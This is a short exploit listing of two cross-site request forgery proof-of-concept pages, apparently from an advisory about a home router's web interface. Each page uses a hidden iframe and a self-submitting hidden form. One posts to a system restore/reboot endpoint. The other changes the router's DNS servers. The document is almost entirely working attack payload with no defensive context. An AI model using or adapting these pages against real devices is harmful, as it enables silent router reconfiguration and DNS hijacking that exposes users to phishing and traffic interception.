&lt;html&gt;&lt;body&gt;
&lt;iframe height=0 width=0 id=&quot;cantseeme&quot; name=&quot;cantseeme&quot;&gt;&lt;/iframe&gt;
&lt;form name=&quot;csrf_form&quot; action=&quot;http://www.example.com/goform/SysToolRestoreSet&quot;; method=&quot;post&quot; target=&quot;cantseeme&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;CMD&quot; value=&#039;SYS_CONF&#039;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;GO&quot; value=&#039;system_reboot.asp&#039;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;CCMD&quot; value=&#039;0&#039;&gt;
&lt;script&gt;document.csrf_form.submit();&lt;/script&gt;
&lt;/body&gt;&lt;/html&gt;


2) Alter the DNS Settings

&lt;html&gt;&lt;body&gt;
&lt;iframe height=0 width=0 id=&quot;cantseeme&quot; name=&quot;cantseeme&quot;&gt;&lt;/iframe&gt;
&lt;form name=&quot;csrf_form&quot; action=&quot;http://www.example.com/goform/AdvSetDns&quot;; method=&quot;post&quot; target=&quot;cantseeme&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;GO&quot; value=&#039;wan_dns.asp&#039;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;rebootTag&quot; value=&#039;&#039;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;DSEN&quot; value=&#039;1&#039;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;DNSEN&quot; value=&#039;on&#039;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;DS1&quot; value=&#039;8.8.4.4&#039;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;DS2&quot; value=&#039;8.8.8.8&#039;&gt;
&lt;script&gt;document.csrf_form.submit();&lt;/script&gt;
&lt;/body&gt;&lt;/html&gt;

